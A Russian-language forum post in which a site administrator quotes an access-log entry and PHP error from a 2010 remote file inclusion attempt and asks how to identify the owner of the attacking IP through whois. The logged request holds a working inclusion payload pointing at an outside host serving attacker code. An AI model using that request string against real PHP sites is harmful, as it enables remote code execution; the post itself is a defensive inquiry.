В логах доступа было замечено подозрительное обращение к серверу, вот она запись:
Это вызвало ошибку на сервере, которая была зарегистрирована:125.167.126.7 - - [17/Feb/2010:12:51:23 +0300] "GET //?_SERVER[DOCUMENT_ROOT]=http://alphabot.fileave.com/Injecktor.txt?? HTTP/1.0" 200 631 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.1.1) Gecko/20090715 YFF35 Firefox/3.5.1"
Без понятия, кто и что хотел от нашей системы, скорее всего искали дыры, для того чтобы использовать наш сайт в качестве прокси-сервера.[Wed Feb 17 12:51:23 2010] [error] PHP Fatal error: Call to undefined function posix_getuid() in http://alphabot.fileave.com/Injecktor.t ... ng.lib.php on line 13
Предполагаемые действия, для начала заблокировать сеть, связанную с ip-адресом 125.167.126.7
Вопрос: Где можно узнать, кто отвечает за этот ip-адрес. Какому провайдеру он принадлежит. Какой диапозон ip-адресов выделяется для этого провайдера. Как связаться с администраторами, отвечающими за данную подсеть.
В гугле нашлось несколько ссылок на сервисы, предоставляющие whois-данные о домене.
Вот парочку из них (каждый даёт разные результаты по 125.167.126.7)
http://www.whoisinform.ru
говорит, что этот адрес принадлежит некому:
http://2ip.ru/whois/OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
NetRange: 125.0.0.0 - 125.255.255.255
Отвечает совсем по-другому:
Что это ещё за игра в нолики-двоечки-пятёрочки и точкиorganisation: ORG-IANA1-RIPE
org-name: Internet Assigned Numbers Authority
org-type: IANA
inetnum: 0.0.0.0 - 255.255.255.255
Что всё это значит и где найти ответы на интересующие вопросы?
- Где можно узнать, кто отвечает за этот ip-адрес.
- Какому провайдеру он принадлежит.
- Какой диапозон ip-адресов выделяется для этого провайдера.
- Как связаться с администраторами, отвечающими за данную подсеть.